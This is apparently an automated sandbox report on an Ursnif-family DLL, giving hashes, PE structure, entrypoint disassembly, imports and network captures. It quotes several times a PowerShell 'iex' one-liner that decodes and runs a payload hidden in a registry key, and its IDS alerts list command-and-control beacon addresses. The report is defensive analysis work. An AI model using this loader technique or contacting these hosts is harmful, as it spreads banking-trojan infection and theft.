SSDEEP:	24:BxSAp7vBZRcZx2DOXUWOLCHGI4XWQHjeTKKjX4CIym1ZJXDOLCHGI4v:BZlvjqoORF4GQqDYB1ZLF4v
MD5:	5CB7CFA6211567E7BA129EA6C6CE8B25
SHA1:	54A05F2BD36E1484A6E0851F2C5589E6A796D486
SHA-256:	57954825E87C3B927CCD486B20EEBADD0FD610605FD8FAD620327FB6849CDFC4
SHA-512:	84921269A9F3462C1A1CCCBDA9A73ABAECBCA3703611809C433B038A78196F695F24709D1E945915346EDF39CD0CF33B8A81FA39917686C579759487A08C0447
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210706143120..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 783875 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 6644..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210706143120..********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..

C:\Users\user\Documents\20210706\PowerShell_transcript.783875.pMvTVJ7a.20210706143107.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	982
Entropy (8bit):	5.472767815313177
Encrypted:	false
SSDEEP:	24:BxSAz7vBZRcZx2DOXUWOLCHGI4XWoHjeTKKjX4CIym1ZJXx3OLCHGI4v:BZXvjqoORF4GoqDYB1ZLBF4v
MD5:	632BBF6D27D2B181031ECD2B1E6C161E
SHA1:	EB6465B56FCC9C0EDB83217DD683372CFE0838B6
SHA-256:	30903F5B9DA137BC4A69D439B1547E02428045FC8C19EA77F11E5372843F1B0C
SHA-512:	91225F13D9DFE3E198C652977C508B1D2557213CFB5CA79FE58D621F56F437AF1DEC31445BAD97A841BAE473BE20A6341F3A88AE2A12F43152C6B18880B52D8D
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210706143108..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 783875 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 5872..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210706143108..********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..

C:\Users\user\Documents\20210706\PowerShell_transcript.783875.yiT3Qq0L.20210706143124.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	982
Entropy (8bit):	5.478069332817427
Encrypted:	false
SSDEEP:	24:BxSAe7vBZRcZx2DOXUWOLCHGI4XW9aHjeTKKjX4CIym1ZJXgOLCHGI4v:BZEvjqoORF4G9aqDYB1ZuF4v
MD5:	438BEB4A380B1787410354552E6AECCD
SHA1:	811ED4433717DEC7990B8B6DF64872C00D12B282
SHA-256:	5D201B62131A6E4B0719EDA4AB4E83E8CC5CD603634787B0A6F85A11C00B25B9
SHA-512:	5EB6717237F25C9402B972E9B73DCB26B62F2954348A8E8F29AB70EFB8C83DC99BF90E3A22399F05006F07873D2DB883D17301BB1D0E035D607C1C3AF264D037
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210706143125..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 783875 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 6244..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210706143125..********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..

Static File Info

General
File type:
Entropy (8bit):	7.475892650509383
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2790000.dll
File size:	45056
MD5:	c40709736c45151601de6db50f379d8b
SHA1:	96fcdac225106f13726477d898a4939ccfcd4781
SHA256:	56b998448c4cd2240edcf0446c8bc7da54f4568ba99d1f3774c43af202aac995
SHA512:	8c93267e7dfe1a3420aa3990ed2ea3c86f6bb02023bae735f2cda3cb8f69f964669ce9fc76f1876399d52701b9c973cf0e192059828100841e63f11b438dfe24
SSDEEP:	768:nlGZ5Eevswd4RoFgmPsnwx+yXqv4kC9/VWH64A1xbDOhtMhDbPm+K5StOQM80Epp:lGZ5ewOKywnavdM/V+6OzsrJK9Wp
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S>.n._.=._.=._.=.'.=._.=.'.=._.=._.=f_.=.P.=._.=.P.=._.=.P.=._.=.'.=._.=.'.=._.=.'.=._.=Rich._.=........PE..L......`...........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10001d4b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x60C0F88C [Wed Jun 9 17:21:16 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	6e9163c62b29a1ccabed40ce8621a95a

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push ecx
mov eax, dword ptr [ebp+0Ch]
push ebx
push esi
push edi
xor edi, edi
inc edi
xor ebx, ebx
sub eax, ebx
mov dword ptr [ebp-04h], edi
je 00007F8A54A8A381h
dec eax
jne 00007F8A54A8A3CBh
push 10004108h
call dword ptr [1000304Ch]
cmp eax, edi
jne 00007F8A54A8A3B8h
push ebx
push 00400000h
push ebx
call dword ptr [10003034h]
mov dword ptr [10004110h], eax
cmp eax, ebx
je 00007F8A54A8A34Ch
mov eax, dword ptr [ebp+08h]
mov esi, 10004118h
mov dword ptr [10004130h], eax
mov eax, esi
lock xadd dword ptr [eax], edi
mov ecx, dword ptr [ebp+10h]
lea eax, dword ptr [ebp+0Ch]
push eax
call 00007F8A54A89FEBh
push eax
push 100015EAh
call 00007F8A54A89AB6h
mov dword ptr [1000410Ch], eax
cmp eax, ebx
jne 00007F8A54A8A36Bh
or eax, FFFFFFFFh
lock xadd dword ptr [esi], eax
mov dword ptr [ebp-04h], ebx
jmp 00007F8A54A8A35Fh
push 10004108h
call dword ptr [10003048h]
test eax, eax
jne 00007F8A54A8A350h
cmp dword ptr [1000410Ch], ebx
je 00007F8A54A8A33Ch
mov esi, 00002328h
push edi
push 00000064h
call dword ptr [10003040h]
mov eax, dword ptr [10004118h]
test eax, eax
je 00007F8A54A8A319h
sub esi, 64h
cmp esi, ebx
jnle 00007F8A54A8A2F9h
push dword ptr [1000410Ch]
call dword ptr [10003018h]
push dword ptr [00000000h]

Rich Headers

Programming Language:

[ASM] VS2008 SP1 build 30729
[LNK] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[EXP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3570	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x311c	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0x14c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3000	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x15c7	0x1600	False	0.730823863636	data	6.49170357793	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3000	0x5c0	0x600	False	0.545572916667	data	5.09033285073	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4000	0x1dc	0x200	False	0.08984375	data	0.369416603835	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bss	0x5000	0x2dc	0x400	False	0.755859375	data	6.27518553548	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x6000	0x9000	0x8400	False	0.971768465909	data	7.8716224231	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	HeapAlloc, HeapFree, Sleep, ExitThread, CloseHandle, GetLastError, GetExitCodeThread, GetSystemTime, SwitchToThread, SetThreadAffinityMask, SetThreadPriority, HeapCreate, HeapDestroy, GetCurrentThread, SleepEx, WaitForSingleObject, InterlockedDecrement, InterlockedIncrement, lstrlenW, VirtualProtect, GetModuleFileNameW, SetLastError, GetModuleHandleA, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, TerminateThread, QueueUserAPC, CreateThread, GetProcAddress, LoadLibraryA, VirtualFree, VirtualAlloc, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW
ntdll.dll	_snwprintf, memset, memcpy, _aulldiv, RtlUnwind, NtQueryVirtualMemory
ADVAPI32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorA

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x10001131

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/06/21-14:30:01.336797	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49782	80	192.168.2.4	40.97.116.82
07/06/21-14:30:49.579442	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49866	80	192.168.2.4	45.90.58.179
07/06/21-14:30:52.271143	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49868	80	192.168.2.4	45.90.58.179
07/06/21-14:30:53.813443	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49868	80	192.168.2.4	45.90.58.179
07/06/21-14:30:53.813443	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49868	80	192.168.2.4	45.90.58.179
07/06/21-14:31:02.086342	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49878	80	192.168.2.4	45.90.58.179
07/06/21-14:31:02.086342	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49878	80	192.168.2.4	45.90.58.179
07/06/21-14:31:07.476458	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49880	80	192.168.2.4	45.90.58.179
07/06/21-14:31:07.476458	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49880	80	192.168.2.4	45.90.58.179
07/06/21-14:31:07.509744	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49882	80	192.168.2.4	45.90.58.179
07/06/21-14:31:11.355328	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49884	80	192.168.2.4	45.90.58.179
07/06/21-14:31:11.376338	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49886	80	192.168.2.4	45.90.58.179
07/06/21-14:31:14.488343	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49888	80	192.168.2.4	45.90.58.179
07/06/21-14:31:25.136749	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49893	80	192.168.2.4	45.90.58.179
07/06/21-14:31:25.136749	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49893	80	192.168.2.4	45.90.58.179
07/06/21-14:31:30.238925	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49894	80	192.168.2.4	45.90.58.179
07/06/21-14:31:30.238925	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49894	80	192.168.2.4	45.90.58.179
07/06/21-14:31:35.488914	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49896	80	192.168.2.4	45.90.58.179

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2021 14:29:41.399020910 CEST	49745	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.399801016 CEST	49746	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.437336922 CEST	443	49745	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.438113928 CEST	443	49746	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.438357115 CEST	49745	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.438364983 CEST	49746	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.438934088 CEST	49745	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.439800024 CEST	49746	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.477174044 CEST	443	49745	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.479255915 CEST	443	49746	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.479304075 CEST	443	49745	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.479326010 CEST	443	49745	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.479403973 CEST	49745	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.481148958 CEST	443	49746	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.481193066 CEST	443	49746	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.481278896 CEST	49746	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.504580975 CEST	49745	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.505201101 CEST	49745	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.505387068 CEST	49745	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.529716015 CEST	49746	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.530639887 CEST	49746	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.542754889 CEST	443	49745	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.543175936 CEST	443	49745	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.543201923 CEST	443	49745	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.543211937 CEST	443	49745	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.543252945 CEST	49745	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.543327093 CEST	49745	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.543363094 CEST	443	49745	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.543378115 CEST	443	49745	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.543409109 CEST	49745	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.552588940 CEST	49745	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.568099976 CEST	443	49746	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.568347931 CEST	443	49746	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.568366051 CEST	443	49746	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.568434000 CEST	49746	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.568466902 CEST	49746	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.568569899 CEST	443	49746	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.569535017 CEST	443	49746	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.569587946 CEST	49746	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.573460102 CEST	443	49745	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.573487997 CEST	443	49745	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.573556900 CEST	49745	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.578185081 CEST	49746	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:29:41.590845108 CEST	443	49745	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:41.616425991 CEST	443	49746	104.20.185.68	192.168.2.4
Jul 6, 2021 14:29:45.604237080 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.604293108 CEST	49762	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.612745047 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.614278078 CEST	49764	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.615170002 CEST	49765	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.616405964 CEST	49766	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.616868973 CEST	49767	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.617741108 CEST	49768	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.642167091 CEST	443	49762	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.642350912 CEST	49762	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.642368078 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.642437935 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.644208908 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.644424915 CEST	49762	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.653727055 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.653863907 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.654509068 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.655308008 CEST	443	49764	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.655426979 CEST	49764	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.655966043 CEST	49764	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.656188965 CEST	443	49765	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.656294107 CEST	49765	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.656816959 CEST	49765	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.657413006 CEST	443	49766	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.657505989 CEST	49766	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.657892942 CEST	443	49767	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.657974958 CEST	49767	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.658077002 CEST	49766	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.658691883 CEST	443	49768	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.658770084 CEST	49768	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.658814907 CEST	49767	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.659383059 CEST	49768	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.682341099 CEST	443	49762	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.682360888 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.682374001 CEST	443	49762	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.682429075 CEST	443	49762	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.682447910 CEST	443	49762	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.682460070 CEST	443	49762	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.682467937 CEST	49762	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.682502031 CEST	443	49762	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.682507038 CEST	49762	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.682533979 CEST	49762	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.682539940 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.682558060 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.682590008 CEST	49762	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.682606936 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.682611942 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.682647943 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.682653904 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.682692051 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.682821989 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.682863951 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.694452047 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.695250988 CEST	49762	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.695511103 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.695714951 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.696101904 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.696166039 CEST	49762	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.696605921 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.696625948 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.696641922 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.696682930 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.696724892 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.696971893 CEST	443	49764	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.697916031 CEST	443	49765	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.698292017 CEST	443	49764	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.698309898 CEST	443	49764	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.698369980 CEST	443	49764	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.698421955 CEST	49764	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.698446035 CEST	49764	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.698448896 CEST	49764	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.699063063 CEST	443	49766	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.699342012 CEST	443	49765	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.699358940 CEST	443	49765	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.699369907 CEST	443	49765	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.699438095 CEST	49765	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.699820995 CEST	443	49767	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.699822903 CEST	49765	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.700259924 CEST	443	49768	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.700589895 CEST	443	49766	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.700609922 CEST	443	49766	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.700622082 CEST	443	49766	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.700855017 CEST	49766	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.701353073 CEST	443	49768	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.701383114 CEST	443	49768	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.701400995 CEST	443	49768	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.701502085 CEST	49768	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.701523066 CEST	49768	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.703056097 CEST	443	49767	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.703074932 CEST	443	49767	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.703144073 CEST	49767	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.703183889 CEST	443	49767	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.703241110 CEST	49767	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.709630013 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.710053921 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.710273981 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.710388899 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.710525990 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.710635900 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.710758924 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.710820913 CEST	49764	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.710911989 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.711205959 CEST	49764	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.715152025 CEST	49766	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.715470076 CEST	49766	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.718363047 CEST	49765	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.719109058 CEST	49765	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.719630957 CEST	49768	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.720226049 CEST	49768	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.720357895 CEST	49767	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.720823050 CEST	49767	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.732917070 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.732935905 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.733016968 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.733330965 CEST	443	49762	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.733412027 CEST	49762	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.733531952 CEST	443	49762	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.733583927 CEST	49762	443	192.168.2.4	87.248.118.22
